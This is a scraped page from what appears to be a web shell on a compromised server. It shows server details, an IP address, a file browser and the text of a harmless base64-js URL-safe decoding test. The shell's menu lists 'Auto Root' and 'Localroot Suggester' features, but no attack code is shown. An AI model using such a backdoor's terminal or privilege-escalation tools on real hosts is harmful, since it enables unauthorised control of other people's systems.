Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.147.67.34
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp_probe /
node_modules /
base64-js /
test /
Delete
Unzip
Name
Size
Permission
Date
Action
big-data.js
591
B
-rw-r--r--
1985-10-26 08:15
convert.js
2.15
KB
-rw-r--r--
1985-10-26 08:15
corrupt.js
304
B
-rw-r--r--
1985-10-26 08:15
url-safe.js
577
B
-rw-r--r--
1985-10-26 08:15
Save
Rename
var test = require('tape') var b64 = require('../') test('decode url-safe style base64 strings', function (t) { var expected = [0xff, 0xff, 0xbe, 0xff, 0xef, 0xbf, 0xfb, 0xef, 0xff] var str = '//++/++/++//' var actual = b64.toByteArray(str) for (var i = 0; i < actual.length; i++) { t.equal(actual[i], expected[i]) } t.equal(b64.byteLength(str), actual.length) str = '__--_--_--__' actual = b64.toByteArray(str) for (i = 0; i < actual.length; i++) { t.equal(actual[i], expected[i]) } t.equal(b64.byteLength(str), actual.length) t.end() })